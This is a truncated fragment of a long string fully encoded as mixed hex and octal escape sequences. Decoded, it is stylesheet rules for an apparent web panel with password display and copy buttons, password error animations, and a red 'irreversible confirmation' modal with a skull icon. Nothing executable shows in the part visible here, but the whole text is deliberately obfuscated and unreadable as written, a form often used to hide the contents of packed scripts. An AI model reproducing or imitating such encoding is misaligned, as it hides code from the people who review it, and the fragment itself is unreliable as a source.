74\x3a\x20\x63\x65\x6e\164\145\x72\x3b\x20\x67\x61\160\x3a\x20\61\162\145\155\73\x20\x62\x61\143\x6b\x67\162\157\165\x6e\x64\x3a\40\166\141\162\50\55\x2d\142\x67\55\x64\141\x72\x6b\x29\x3b\x20\160\x61\x64\144\151\x6e\147\x3a\x20\61\162\145\x6d\73\x20\142\x6f\x72\144\x65\162\55\162\141\x64\151\165\163\72\40\x38\x70\170\x3b\40\x6d\x61\162\147\x69\x6e\55\164\157\160\72\40\61\x72\145\x6d\73\x20\160\x6f\163\x69\x74\151\157\x6e\x3a\40\x72\x65\154\x61\164\x69\x76\145\73\40\172\x2d\x69\156\x64\x65\x78\x3a\x20\x31\73\x20\x62\157\162\144\145\162\72\40\61\x70\x78\40\163\157\x6c\151\144\x20\x76\x61\x72\x28\x2d\55\x61\143\143\x65\x6e\164\55\x67\x6f\x6c\x64\x29\x3b\40\175\12\11\x9\56\160\141\163\x73\x77\157\x72\144\x2d\154\x61\142\145\x6c\x20\173\40\143\x6f\x6c\157\162\x3a\x20\x76\141\162\50\x2d\55\164\x65\170\x74\x2d\155\145\144\51\x3b\x20\x66\157\x6e\x74\x2d\x73\x69\172\145\72\40\60\56\x39\162\145\x6d\x3b\40\146\157\x6e\x74\x2d\x77\x65\151\x67\x68\164\72\40\x35\x30\x30\73\40\175\xa\11\11\x2e\x70\141\x73\x73\x77\157\x72\x64\55\x76\141\x6c\165\x65\x20\x7b\x20\x63\157\154\x6f\x72\x3a\x20\x76\x61\162\50\x2d\55\x61\x63\x63\x65\156\164\x2d\x67\157\x6c\x64\x29\73\40\146\x6f\156\x74\x2d\x73\x69\x7a\x65\72\40\x31\56\62\x72\x65\x6d\73\x20\146\x6f\156\x74\x2d\167\x65\x69\x67\x68\x74\x3a\x20\67\60\60\73\x20\x66\x6f\x6e\164\55\146\141\155\x69\154\171\x3a\40\x27\103\x6f\x75\162\151\145\x72\x20\x4e\145\167\x27\x2c\x20\x6d\x6f\x6e\157\x73\160\x61\143\145\73\x20\154\x65\x74\x74\145\162\55\163\160\x61\x63\x69\x6e\x67\x3a\40\62\160\170\73\40\164\145\x78\x74\55\x73\150\x61\x64\157\x77\72\40\60\40\60\40\x31\60\160\170\40\166\x61\x72\50\x2d\x2d\141\143\143\x65\156\x74\x2d\x67\157\x6c\144\51\73\x20\175\12\x9\11\x2e\x63\157\160\171\55\x70\141\163\163\167\157\162\x64\55\142\164\156\x20\173\x20\142\x61\143\153\147\x72\x6f\165\156\144\72\x20\166\x61\x72\x28\55\x2d\x61\x63\x63\145\x6e\164\x2d\142\x6c\165\145\51\x3b\x20\142\157\162\x64\145\162\72\x20\156\157\156\145\x3b\x20\x63\x6f\x6c\x6f\x72\x3a\x20\x76\141\x72\x28\x2d\x2d\142\x67\x2d\x64\141\162\x6b\x29\73\x20\x70\141\x64\x64\151\156\147\72\40\x30\56\65\x72\x65\155\40\61\x72\145\x6d\x3b\x20\x62\x6f\162\x64\145\x72\55\x72\141\x64\151\x75\x73\x3a\40\66\x70\x78\x3b\40\x63\x75\x72\163\x6f\162\72\40\160\x6f\x69\156\x74\145\162\73\x20\x66\157\156\164\55\x73\151\x7a\145\72\40\61\x72\145\155\x3b\x20\x74\x72\141\x6e\163\x69\164\151\x6f\156\x3a\x20\x61\154\x6c\x20\60\56\x33\x73\73\40\146\157\x6e\164\55\x77\145\151\147\150\x74\x3a\40\65\x30\60\x3b\x20\175\12\11\11\56\143\x6f\x70\x79\55\x70\141\x73\x73\x77\x6f\x72\x64\55\x62\x74\x6e\x3a\x68\157\x76\145\162\x20\x7b\40\x62\x61\143\153\147\x72\x6f\165\x6e\144\x3a\40\x23\71\x64\143\61\x66\x66\73\40\x74\162\141\156\163\146\x6f\x72\155\x3a\x20\163\x63\x61\154\x65\x28\61\x2e\x30\x35\51\x3b\40\142\157\x78\55\x73\150\141\x64\157\x77\x3a\40\60\x20\x34\x70\x78\40\61\x32\x70\170\x20\162\x67\x62\x61\x28\x31\x33\x30\x2c\x20\x31\x37\60\54\x20\62\65\65\x2c\40\x30\56\x34\51\x3b\x20\175\12\11\x9\x2e\143\157\160\171\55\160\x61\x73\x73\x77\x6f\162\x64\55\x62\x74\156\x3a\x61\143\x74\x69\166\x65\x20\x7b\40\164\162\x61\x6e\163\x66\157\x72\155\x3a\x20\163\x63\141\x6c\x65\50\x30\56\x39\65\x29\x3b\x20\175\12\11\11\x2e\x70\141\163\163\x77\x6f\x72\144\x2d\x69\156\x70\x75\164\x2d\147\x72\157\x75\x70\40\x7b\40\160\157\163\x69\164\x69\157\x6e\x3a\x20\x72\145\x6c\141\x74\151\x76\x65\73\x20\172\55\x69\156\x64\x65\170\x3a\40\x31\x3b\x20\175\xa\11\11\x2e\160\x61\163\x73\167\x6f\162\144\x2d\151\x6e\160\165\x74\x2d\x67\x72\x6f\x75\x70\x20\154\141\x62\x65\x6c\40\173\40\144\151\x73\160\x6c\141\171\72\x20\x62\x6c\x6f\143\153\73\x20\x63\157\x6c\157\x72\x3a\x20\166\x61\x72\x28\x2d\x2d\x74\145\x78\x74\x2d\x6c\x69\x67\150\x74\51\73\x20\x66\x6f\x6e\164\x2d\167\x65\x69\x67\150\x74\x3a\40\x35\x30\x30\73\40\155\141\x72\147\x69\156\55\142\157\x74\x74\157\x6d\72\40\60\56\x35\162\x65\x6d\73\x20\146\x6f\156\164\55\x73\151\x7a\x65\72\40\60\x2e\x39\65\x72\145\155\x3b\x20\x7d\xa\11\x9\56\160\x61\163\163\167\157\162\144\x2d\151\x6e\x70\165\x74\55\147\x72\x6f\165\x70\x20\151\x6e\160\165\x74\x5b\164\171\160\145\x3d\42\x70\141\163\x73\167\157\x72\144\x22\x5d\x20\173\40\167\x69\x64\x74\x68\x3a\40\x31\x30\x30\45\x3b\x20\160\x61\144\144\151\156\x67\x3a\40\x31\162\145\155\x3b\x20\142\141\143\x6b\x67\x72\x6f\x75\156\x64\x3a\x20\166\141\x72\50\55\55\142\x67\55\x64\141\162\153\51\73\40\142\x6f\162\x64\x65\162\x3a\40\x32\160\170\x20\x73\x6f\x6c\x69\x64\x20\166\141\x72\x28\55\55\142\x6f\x72\144\145\162\x2d\x63\x6f\x6c\x6f\162\x29\x3b\x20\x62\x6f\x72\x64\x65\x72\x2d\162\x61\x64\151\165\163\72\40\70\160\170\x3b\40\x63\157\154\x6f\x72\x3a\40\166\x61\x72\50\55\55\164\x65\170\x74\55\154\151\x67\150\164\x29\73\40\x66\x6f\156\x74\55\x73\x69\172\x65\72\x20\61\56\61\x72\x65\155\73\40\x66\x6f\x6e\x74\x2d\146\141\x6d\x69\154\171\x3a\x20\47\103\157\x75\x72\x69\145\x72\x20\116\145\167\47\x2c\40\155\157\x6e\x6f\x73\x70\x61\143\x65\73\x20\154\x65\164\x74\x65\x72\55\x73\160\141\x63\151\156\x67\72\x20\63\160\x78\x3b\40\x74\x72\x61\x6e\x73\151\164\151\157\x6e\72\x20\141\x6c\x6c\x20\x30\56\63\163\x3b\40\142\x6f\x78\55\x73\x69\172\151\156\x67\x3a\x20\x62\157\x72\x64\145\162\55\x62\x6f\170\73\40\x7d\xa\11\11\x2e\160\141\x73\163\167\x6f\162\x64\55\151\156\x70\x75\164\x2d\147\162\157\x75\x70\x20\x69\x6e\x70\165\164\133\164\x79\160\x65\x3d\42\x70\141\x73\163\167\x6f\x72\144\x22\x5d\x3a\146\157\143\165\x73\40\173\x20\157\165\164\154\x69\156\x65\x3a\x20\x6e\x6f\156\x65\73\40\x62\x6f\x72\144\145\x72\55\x63\x6f\154\x6f\162\x3a\40\166\x61\162\50\55\x2d\141\143\x63\145\156\164\x2d\142\x6c\x75\x65\51\73\40\142\x6f\170\x2d\163\150\141\x64\x6f\167\x3a\x20\x30\40\60\x20\x30\x20\x33\x70\170\x20\x72\x67\142\x61\50\61\63\60\54\x20\x31\67\60\x2c\40\62\65\65\54\x20\x30\x2e\62\x29\x3b\x20\x74\x72\x61\x6e\163\146\157\x72\x6d\72\40\163\x63\141\x6c\145\50\61\56\60\x32\x29\x3b\40\x7d\xa\x9\11\x2e\x70\141\x73\x73\x77\157\162\x64\x2d\x65\162\162\x6f\x72\40\x7b\x20\x63\x6f\154\157\x72\x3a\x20\x76\x61\162\x28\55\x2d\x61\x63\x63\145\x6e\164\x2d\162\145\144\x29\x3b\x20\x66\x6f\x6e\164\55\163\151\172\145\72\40\x30\x2e\x39\x72\x65\x6d\73\x20\155\141\162\147\151\x6e\55\164\x6f\160\72\40\60\x2e\65\162\x65\x6d\x3b\x20\155\151\156\x2d\150\x65\151\147\x68\164\72\x20\61\x2e\x35\x72\x65\x6d\73\40\144\151\163\x70\154\141\171\72\x20\x66\154\145\170\73\x20\x61\154\x69\147\x6e\55\x69\164\x65\155\x73\x3a\40\x63\x65\x6e\x74\x65\162\x3b\40\x67\x61\160\x3a\40\60\x2e\65\x72\x65\155\x3b\x20\157\160\x61\x63\x69\164\x79\x3a\x20\x30\x3b\40\164\162\141\x6e\x73\151\x74\x69\x6f\x6e\72\40\x6f\x70\x61\143\151\164\x79\40\60\x2e\x33\x73\x3b\x20\175\xa\11\x9\x2e\x70\x61\163\x73\167\157\162\144\55\145\x72\162\x6f\162\56\163\150\x6f\x77\40\173\x20\x6f\160\141\143\x69\x74\171\72\x20\x31\x3b\x20\x61\x6e\x69\155\x61\164\151\157\156\x3a\x20\x73\150\141\x6b\x65\x20\60\x2e\x35\163\x3b\40\x7d\12\x9\11\x40\153\x65\171\146\162\x61\155\145\x73\x20\x73\x68\141\153\145\x20\x7b\x20\60\x25\x2c\x20\61\x30\60\x25\x20\173\x20\164\162\141\x6e\163\x66\x6f\x72\155\x3a\x20\164\162\x61\x6e\x73\x6c\x61\164\145\130\50\x30\x29\73\40\x7d\40\x32\x35\45\40\173\40\164\x72\141\156\163\x66\x6f\162\x6d\x3a\40\x74\162\x61\156\163\154\x61\x74\x65\x58\50\55\61\x30\x70\x78\x29\73\40\x7d\x20\67\x35\45\40\x7b\40\x74\162\x61\156\x73\146\x6f\x72\x6d\72\x20\164\162\141\x6e\x73\x6c\141\x74\x65\x58\50\x31\x30\160\x78\x29\x3b\x20\x7d\x20\x7d\12\x9\x9\x2e\x70\141\163\x73\167\157\162\x64\x2d\x6d\x6f\x64\x61\x6c\55\x61\x63\164\x69\x6f\156\x73\40\x7b\40\x64\x69\x73\160\x6c\141\171\72\x20\146\154\x65\x78\73\40\147\x61\160\x3a\40\x31\x72\145\155\x3b\x20\152\165\x73\x74\x69\146\x79\x2d\x63\157\156\x74\145\156\x74\72\x20\x66\x6c\145\170\55\145\156\144\73\40\x6d\x61\162\x67\151\x6e\x2d\x74\157\x70\72\x20\61\162\x65\155\x3b\x20\x70\157\x73\151\164\x69\157\156\x3a\40\x72\x65\x6c\141\x74\151\x76\x65\73\x20\x7a\x2d\151\156\x64\145\x78\72\x20\61\x3b\x20\x7d\12\x9\x9\56\160\x61\163\163\167\x6f\162\x64\x2d\142\164\x6e\x2d\143\x61\x6e\143\145\x6c\x2c\40\56\x70\141\163\x73\167\157\162\x64\x2d\142\164\x6e\55\163\165\142\x6d\x69\164\x20\173\40\x70\x61\x64\x64\151\156\x67\x3a\x20\x30\x2e\67\65\162\145\x6d\x20\x32\162\145\x6d\x3b\40\x62\157\x72\144\x65\162\72\x20\x6e\x6f\156\145\73\40\142\157\x72\x64\145\x72\x2d\x72\141\x64\x69\x75\163\72\40\x38\x70\x78\73\40\x66\x6f\x6e\x74\x2d\x73\151\x7a\145\72\40\61\x72\145\x6d\73\x20\x66\x6f\156\164\x2d\x77\145\151\147\x68\x74\x3a\x20\x36\x30\x30\73\x20\143\165\x72\x73\x6f\162\72\x20\x70\x6f\x69\x6e\164\145\x72\73\40\x74\162\x61\x6e\163\151\x74\x69\157\x6e\72\x20\141\154\154\40\60\x2e\63\163\x3b\40\146\157\156\164\x2d\x66\141\155\x69\x6c\171\72\40\166\141\162\50\55\x2d\146\157\156\x74\55\146\141\x6d\x69\x6c\x79\x29\73\x20\175\12\x9\11\56\x70\141\163\x73\167\x6f\162\x64\55\142\x74\x6e\x2d\143\141\156\x63\x65\x6c\40\173\40\142\x61\143\x6b\147\x72\157\165\156\x64\x3a\40\x76\x61\162\50\x2d\55\142\x67\x2d\x6c\151\147\x68\164\51\73\x20\x63\x6f\x6c\x6f\x72\x3a\40\x76\x61\x72\x28\x2d\x2d\x74\145\170\x74\x2d\x6c\x69\x67\x68\164\x29\x3b\40\142\x6f\162\144\145\x72\72\x20\x32\x70\x78\x20\x73\157\154\x69\144\x20\x76\141\162\50\55\55\x62\157\x72\x64\145\162\x2d\x63\x6f\154\157\162\x29\73\40\x7d\xa\x9\x9\56\160\141\x73\x73\x77\x6f\162\x64\x2d\x62\164\x6e\x2d\143\141\x6e\x63\x65\154\72\x68\x6f\x76\x65\x72\40\x7b\x20\x62\x61\x63\x6b\147\x72\x6f\x75\x6e\144\x3a\40\x76\141\162\x28\x2d\55\142\x67\x2d\144\141\x72\153\51\x3b\40\142\x6f\x72\144\145\162\x2d\x63\x6f\154\157\x72\x3a\x20\166\x61\x72\50\55\55\164\x65\170\x74\55\x6d\x65\x64\x29\73\x20\164\162\141\x6e\163\146\x6f\162\x6d\x3a\x20\164\x72\x61\156\163\154\141\164\x65\131\x28\55\x32\160\170\51\x3b\x20\175\xa\11\x9\56\x70\141\x73\x73\167\x6f\162\x64\x2d\142\164\x6e\55\x73\165\142\x6d\x69\x74\40\x7b\x20\142\x61\x63\153\147\162\x6f\x75\156\x64\72\40\154\x69\x6e\x65\x61\x72\x2d\x67\x72\x61\144\x69\x65\x6e\164\x28\61\63\x35\x64\x65\x67\54\x20\166\x61\162\x28\x2d\x2d\x61\x63\143\145\x6e\x74\55\x62\154\x75\145\x29\x20\60\x25\x2c\40\x23\x39\x64\x63\x31\146\x66\x20\61\x30\x30\x25\51\x3b\40\x63\x6f\154\157\162\72\40\x76\141\162\50\x2d\55\142\x67\55\144\141\x72\x6b\x29\x3b\40\x62\x6f\170\x2d\x73\150\141\x64\x6f\x77\x3a\x20\60\x20\64\x70\x78\40\x31\x35\160\170\x20\x72\x67\x62\x61\x28\x31\x33\x30\54\40\61\67\60\54\40\x32\x35\65\x2c\x20\x30\56\x33\51\73\40\175\xa\x9\x9\56\160\141\163\x73\167\x6f\162\144\x2d\142\x74\156\55\x73\165\142\x6d\151\164\x3a\150\157\x76\145\162\x20\173\40\164\162\x61\x6e\163\146\x6f\x72\x6d\x3a\x20\164\x72\x61\x6e\x73\x6c\x61\164\145\x59\50\55\62\x70\170\x29\x3b\x20\142\x6f\x78\x2d\163\x68\141\144\157\x77\72\40\x30\x20\x36\x70\x78\40\62\x30\160\x78\x20\162\147\142\x61\50\x31\63\x30\54\40\61\x37\x30\x2c\40\x32\65\65\54\x20\60\x2e\x35\51\73\40\x7d\12\x9\x9\x2e\x70\x61\163\163\167\x6f\162\144\x2d\x62\x74\x6e\55\x73\165\142\155\151\164\72\x61\143\x74\151\x76\145\40\x7b\40\164\162\x61\x6e\x73\146\157\162\155\72\40\164\x72\141\156\163\x6c\x61\x74\145\x59\x28\60\x29\x3b\x20\175\xa\11\11\x2e\160\x61\163\x73\x77\x6f\162\144\55\142\164\156\55\163\165\x62\155\151\x74\x3a\144\x69\163\x61\x62\x6c\x65\144\40\x7b\x20\157\x70\141\x63\x69\x74\171\x3a\x20\60\x2e\66\x3b\40\x63\x75\162\163\x6f\162\72\x20\156\x6f\x74\x2d\x61\x6c\x6c\157\x77\145\144\73\x20\164\x72\141\x6e\163\146\x6f\162\155\x3a\x20\x6e\157\156\145\x3b\x20\x7d\xa\x9\x9\xa\x9\x9\57\52\40\x49\162\162\x65\x76\x65\x72\163\151\142\154\145\40\x43\157\156\146\x69\x72\x6d\x61\x74\151\157\156\x20\x4d\x6f\x64\x61\154\x20\123\x74\171\x6c\151\156\147\40\x2a\x2f\12\11\x9\56\151\162\162\145\x76\145\x72\163\x69\x62\154\145\x2d\155\x6f\144\x61\x6c\55\x63\157\x6e\x74\145\156\x74\x20\173\xa\x9\11\11\x77\151\x64\164\x68\x3a\x20\x39\x30\45\x3b\12\x9\11\x9\x6d\x61\170\55\x77\151\144\164\x68\72\x20\64\65\60\x70\x78\73\xa\11\11\x9\160\141\144\x64\x69\x6e\x67\72\40\60\73\12\x9\x9\x9\142\x6f\x72\x64\145\x72\x3a\x20\x32\160\x78\40\163\157\x6c\x69\144\40\x76\x61\162\50\x2d\55\x61\143\143\x65\x6e\164\55\x72\x65\x64\51\x3b\12\11\11\11\x62\141\143\x6b\147\162\157\x75\x6e\x64\x3a\x20\x6c\x69\156\x65\x61\x72\x2d\147\x72\x61\144\151\x65\x6e\164\50\61\x33\x35\x64\x65\147\54\x20\43\x31\x61\x30\x61\x30\141\x20\x30\45\54\x20\43\62\x64\60\146\60\x66\x20\x35\x30\x25\54\x20\43\61\x61\60\141\60\141\40\61\60\60\45\51\x3b\xa\11\11\11\142\157\170\55\163\x68\141\144\157\x77\x3a\40\x30\x20\x30\40\x34\x30\x70\x78\x20\x72\147\142\x61\x28\62\x32\60\54\40\65\63\54\40\66\x39\x2c\x20\60\56\70\51\x2c\12\x9\11\x9\x9\11\11\60\40\x30\40\70\60\x70\x78\40\162\147\x62\x61\x28\x32\62\60\54\x20\x35\63\x2c\x20\x36\71\54\40\x30\56\x34\51\54\xa\11\11\11\x9\x9\11\x69\156\163\x65\x74\40\60\40\60\x20\62\65\x70\170\40\162\x67\142\x61\x28\x32\62\x30\54\x20\x35\x33\x2c\x20\x36\x39\x2c\40\x30\x2e\x31\x29\73\xa\11\11\11\x70\157\163\x69\x74\x69\157\x6e\72\x20\x72\x65\154\x61\x74\x69\x76\x65\73\xa\x9\11\11\x6f\166\x65\x72\146\154\157\167\x3a\x20\x68\151\x64\144\145\156\73\12\x9\11\x7d\12\11\11\xa\x9\x9\x2e\151\x72\162\x65\166\145\162\163\x69\142\154\x65\55\x6d\157\144\141\154\55\x63\157\156\x74\145\x6e\164\x3a\72\142\145\x66\157\162\x65\40\173\xa\x9\x9\x9\143\157\x6e\x74\145\156\x74\72\x20\47\47\x3b\xa\x9\11\x9\160\x6f\163\x69\x74\151\x6f\x6e\72\40\x61\142\163\157\x6c\165\164\145\73\12\x9\x9\x9\164\x6f\x70\x3a\x20\x30\x3b\xa\x9\11\11\x6c\x65\146\x74\x3a\40\60\x3b\xa\11\x9\11\x72\151\x67\150\x74\72\40\x30\73\12\11\11\11\142\x6f\x74\x74\x6f\155\72\40\60\73\xa\11\11\11\142\141\143\153\x67\162\157\165\x6e\144\72\x20\x72\x65\x70\145\141\164\151\x6e\x67\55\x6c\x69\x6e\x65\141\162\55\147\162\x61\x64\151\145\156\164\x28\xa\x9\x9\11\x9\x30\x64\145\x67\x2c\xa\11\x9\x9\11\164\x72\141\x6e\163\x70\x61\x72\145\x6e\164\x2c\xa\11\x9\11\11\164\162\141\x6e\x73\x70\141\x72\145\156\164\x20\x32\x70\170\54\12\x9\x9\x9\11\162\x67\142\141\50\x32\62\60\54\40\x35\x33\54\40\x36\x39\54\40\60\56\60\63\x29\x20\62\x70\170\x2c\xa\x9\11\11\x9\x72\x67\142\x61\50\62\x32\60\54\x20\x35\63\x2c\40\66\71\54\x20\x30\x2e\60\63\x29\40\64\x70\170\12\x9\x9\x9\51\73\12\x9\11\x9\x70\157\x69\x6e\164\145\162\55\x65\x76\145\156\164\163\72\x20\156\157\156\145\x3b\12\11\x9\175\12\x9\x9\xa\11\11\x2e\x69\x72\162\x65\166\x65\162\163\x69\x62\x6c\145\55\x6d\x6f\x64\141\154\x2d\x68\x65\141\x64\x65\162\x20\x7b\xa\x9\x9\x9\x62\141\x63\153\x67\x72\157\165\x6e\x64\72\40\154\x69\156\145\x61\x72\x2d\147\x72\x61\x64\151\x65\x6e\164\50\x31\63\x35\144\145\147\54\x20\43\x64\143\63\65\64\65\40\60\45\54\x20\x23\x63\x38\62\x33\x33\63\x20\65\x30\x25\54\40\43\x62\144\x32\61\63\60\40\x31\x30\60\45\51\x3b\12\x9\x9\x9\x70\141\x64\144\151\x6e\147\x3a\40\x31\x72\145\x6d\x20\61\56\65\162\x65\155\73\xa\x9\11\11\142\157\162\144\x65\162\55\142\x6f\x74\x74\x6f\x6d\x3a\x20\62\160\170\x20\163\x6f\154\x69\144\x20\162\x67\x62\x61\x28\x32\65\x35\x2c\x20\x32\65\x35\x2c\x20\62\65\65\54\40\x30\56\x32\51\73\xa\11\11\11\160\157\163\x69\164\x69\157\x6e\72\x20\162\145\x6c\x61\x74\x69\x76\145\x3b\xa\x9\11\11\172\55\x69\156\144\145\170\x3a\40\x31\73\12\x9\11\x7d\12\11\x9\xa\x9\x9\x2e\151\162\162\145\166\145\162\x73\151\142\x6c\x65\x2d\x6d\x6f\x64\x61\x6c\x2d\150\145\x61\x64\x65\162\x20\x68\x33\x20\173\12\x9\x9\11\x6d\x61\x72\x67\x69\x6e\x3a\x20\x30\x3b\12\x9\11\x9\146\x6f\x6e\x74\x2d\163\x69\x7a\145\72\x20\x31\56\63\x72\x65\155\73\xa\x9\11\11\146\x6f\x6e\164\x2d\167\x65\151\x67\x68\164\x3a\40\x37\60\x30\x3b\12\11\11\x9\x63\x6f\x6c\x6f\x72\x3a\x20\x23\x66\x66\146\146\x66\x66\x3b\xa\11\x9\x9\164\145\170\x74\55\163\150\141\x64\157\167\72\40\x30\x20\60\40\61\x35\x70\170\40\162\x67\x62\141\50\x32\65\65\54\40\62\x35\x35\x2c\40\x32\65\x35\x2c\40\60\x2e\65\51\54\xa\11\x9\x9\x9\x9\x9\60\40\62\160\x78\x20\x38\160\170\40\162\x67\142\x61\x28\60\x2c\x20\x30\x2c\40\60\x2c\x20\60\x2e\65\51\x3b\12\x9\11\x9\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\x61\143\151\156\147\x3a\40\x30\56\65\x70\x78\x3b\12\11\x9\x9\164\145\170\164\x2d\164\162\141\x6e\x73\x66\x6f\x72\155\x3a\x20\x75\x70\160\145\x72\x63\141\163\x65\73\12\11\11\x9\x61\156\x69\x6d\x61\164\x69\157\156\72\40\167\141\162\x6e\151\x6e\x67\120\x75\154\163\x65\40\62\x73\x20\x65\x61\163\145\55\151\156\x2d\157\x75\164\x20\151\x6e\x66\151\156\x69\164\x65\x3b\xa\x9\11\175\xa\11\x9\xa\11\11\100\153\145\171\146\x72\141\x6d\145\x73\x20\167\x61\x72\x6e\x69\156\147\120\165\154\x73\145\x20\173\xa\11\11\11\x30\x25\54\40\x31\60\x30\x25\40\x7b\xa\x9\x9\11\11\x74\x65\170\x74\x2d\163\150\141\x64\157\x77\x3a\x20\60\x20\60\x20\x32\x30\x70\x78\40\162\147\x62\x61\x28\62\65\x35\x2c\x20\x32\x35\65\x2c\40\62\65\65\x2c\40\x30\56\x35\x29\x2c\12\11\11\x9\11\11\11\x9\x30\40\62\x70\x78\x20\x31\x30\160\170\x20\162\x67\x62\x61\x28\x30\x2c\40\60\54\40\60\54\x20\x30\x2e\65\x29\x3b\12\x9\11\11\175\12\x9\11\x9\x35\x30\45\x20\173\xa\x9\x9\11\x9\x74\145\x78\164\55\163\x68\x61\144\157\x77\72\40\x30\40\60\x20\x33\60\160\x78\x20\162\x67\x62\x61\50\x32\65\65\54\x20\62\65\65\54\x20\x32\65\x35\54\40\x30\x2e\x38\51\x2c\xa\x9\x9\11\11\11\11\x9\60\x20\x32\160\170\40\61\x35\160\x78\40\162\x67\x62\141\50\60\x2c\x20\x30\x2c\x20\60\x2c\x20\x30\x2e\x37\x29\x2c\12\11\11\x9\x9\x9\x9\x9\60\x20\x30\40\x34\60\x70\x78\x20\162\x67\142\x61\x28\x32\65\65\x2c\x20\x30\x2c\x20\60\x2c\x20\x30\56\x36\x29\73\xa\11\11\x9\175\12\x9\x9\175\xa\11\x9\xa\x9\11\56\151\x72\162\x65\x76\x65\162\163\151\x62\x6c\145\55\x6d\157\x64\141\154\x2d\x68\x65\x61\x64\x65\162\40\x2e\x63\x6c\157\x73\x65\x20\173\xa\11\x9\x9\x63\157\x6c\157\x72\72\40\43\x66\x66\146\146\146\x66\73\12\x9\x9\x9\146\157\x6e\x74\x2d\163\151\x7a\145\72\40\62\162\x65\155\73\12\x9\11\x9\146\x6f\x6e\164\x2d\167\145\x69\147\150\164\72\x20\63\x30\60\73\xa\x9\x9\11\157\160\x61\143\x69\x74\171\x3a\40\x30\56\70\73\12\x9\11\x9\164\162\141\x6e\x73\x69\x74\x69\x6f\156\x3a\40\x61\154\x6c\x20\60\56\63\163\73\12\11\11\175\12\11\x9\12\x9\x9\56\x69\162\x72\x65\166\145\162\163\x69\x62\154\x65\55\155\x6f\144\141\154\x2d\150\x65\141\x64\145\x72\40\x2e\143\x6c\x6f\163\145\x3a\150\157\166\145\x72\40\x7b\12\x9\x9\x9\x6f\160\x61\143\151\164\x79\x3a\x20\61\x3b\12\x9\x9\x9\x74\x72\x61\156\163\146\157\162\x6d\x3a\x20\x73\143\141\154\x65\x28\x31\x2e\62\x29\73\xa\11\x9\x9\164\x65\x78\x74\x2d\x73\x68\x61\x64\157\x77\x3a\x20\x30\x20\x30\40\61\60\160\170\40\x72\147\142\x61\x28\62\65\65\54\40\x32\65\x35\54\40\62\x35\x35\54\40\x30\56\70\51\x3b\xa\x9\x9\175\12\x9\11\12\x9\x9\56\151\x72\162\145\166\x65\162\163\x69\142\x6c\x65\x2d\155\157\x64\x61\x6c\55\142\x6f\x64\x79\x20\173\12\11\x9\11\x70\x61\x64\144\x69\156\147\72\40\x31\x2e\x35\162\x65\155\x3b\xa\x9\x9\11\x70\157\163\x69\164\x69\x6f\x6e\x3a\x20\162\145\x6c\x61\164\x69\x76\x65\73\12\11\11\11\x7a\55\151\x6e\144\145\x78\72\40\61\73\12\x9\11\175\12\11\x9\12\11\11\x2e\151\x72\162\145\x76\145\x72\x73\151\142\x6c\145\x2d\x77\x61\x72\156\x69\x6e\147\x2d\x62\157\170\x20\173\12\11\11\x9\142\x61\x63\153\147\162\x6f\165\x6e\144\72\40\x6c\151\x6e\145\x61\x72\x2d\147\x72\x61\144\x69\x65\156\164\50\61\x33\65\144\x65\x67\x2c\40\162\147\x62\141\50\62\x32\60\54\40\x35\x33\54\40\x36\71\54\x20\60\56\x31\x29\x20\x30\45\54\x20\x72\147\142\x61\x28\62\60\x30\54\40\x33\65\54\40\65\61\x2c\x20\x30\56\61\65\51\40\61\60\x30\45\x29\x3b\12\x9\11\11\x62\x6f\x72\x64\145\x72\72\x20\62\x70\170\40\163\x6f\154\x69\x64\x20\162\147\142\x61\50\x32\62\x30\x2c\40\65\63\x2c\40\66\x39\x2c\40\x30\x2e\65\51\73\xa\11\x9\x9\x62\157\x72\144\x65\x72\x2d\162\141\x64\151\165\x73\x3a\x20\61\x30\160\170\73\12\11\11\11\x70\141\144\x64\x69\156\147\x3a\40\61\x2e\62\x35\x72\145\x6d\73\12\x9\11\11\164\145\x78\164\55\x61\154\151\x67\x6e\x3a\40\143\145\x6e\164\x65\162\73\xa\x9\11\11\160\x6f\163\x69\164\151\x6f\x6e\x3a\x20\x72\145\x6c\x61\x74\x69\166\x65\x3b\12\x9\11\11\157\x76\145\162\x66\154\x6f\167\x3a\x20\150\151\x64\144\145\x6e\73\12\11\x9\11\142\157\170\x2d\x73\150\x61\144\x6f\167\x3a\x20\x69\156\x73\x65\x74\40\60\40\x30\40\62\x35\x70\170\40\x72\147\x62\x61\x28\62\62\x30\54\x20\x35\63\54\x20\x36\x39\x2c\40\x30\x2e\x32\x29\54\xa\11\11\x9\x9\11\x9\60\40\x30\40\x33\x30\x70\170\x20\162\x67\142\141\x28\x32\62\x30\x2c\40\x35\63\x2c\x20\66\71\54\x20\x30\56\x33\51\x3b\xa\x9\11\x7d\xa\11\x9\xa\11\11\x2e\151\162\162\x65\x76\x65\x72\x73\151\x62\x6c\x65\55\x77\141\162\x6e\151\x6e\x67\55\x62\x6f\x78\72\x3a\x62\145\x66\x6f\162\145\40\x7b\12\11\11\11\x63\157\156\x74\145\156\164\72\x20\47\x27\x3b\12\11\11\x9\160\157\163\151\164\x69\x6f\x6e\x3a\40\141\x62\x73\157\x6c\x75\x74\145\x3b\xa\11\11\x9\164\x6f\160\x3a\x20\55\65\x30\x25\x3b\xa\11\11\x9\154\x65\x66\164\72\x20\x2d\65\x30\x25\73\12\11\11\x9\167\x69\144\x74\x68\72\x20\x32\x30\60\x25\73\xa\11\11\x9\x68\x65\x69\147\150\164\x3a\40\x32\x30\x30\45\x3b\xa\x9\x9\x9\142\141\143\x6b\147\162\157\x75\156\x64\x3a\40\x72\141\x64\x69\141\154\x2d\x67\162\141\x64\151\145\x6e\164\50\x63\x69\x72\x63\154\145\x2c\x20\162\x67\142\141\50\x32\x32\60\54\40\65\63\54\40\x36\x39\54\x20\x30\56\x31\x35\51\x20\60\45\x2c\x20\164\162\x61\x6e\x73\x70\141\x72\x65\x6e\x74\40\67\60\45\51\x3b\12\x9\x9\11\141\x6e\x69\155\x61\x74\151\157\156\72\x20\162\157\164\x61\x74\x65\40\61\65\163\40\x6c\151\156\x65\141\x72\40\151\x6e\x66\151\x6e\x69\164\145\73\xa\11\x9\x7d\12\11\11\12\x9\x9\56\x69\162\162\x65\x76\x65\x72\163\151\142\154\145\55\x69\143\157\156\40\x7b\12\11\x9\x9\x66\157\x6e\164\55\x73\151\x7a\x65\x3a\x20\x33\56\65\x72\145\x6d\x3b\12\11\11\x9\x6d\141\x72\x67\151\x6e\x2d\142\157\x74\x74\157\x6d\x3a\x20\60\x2e\x37\x35\x72\145\155\73\xa\11\x9\x9\141\156\151\x6d\x61\164\151\x6f\156\72\40\163\x6b\165\154\154\106\x6c\x6f\141\164\x20\x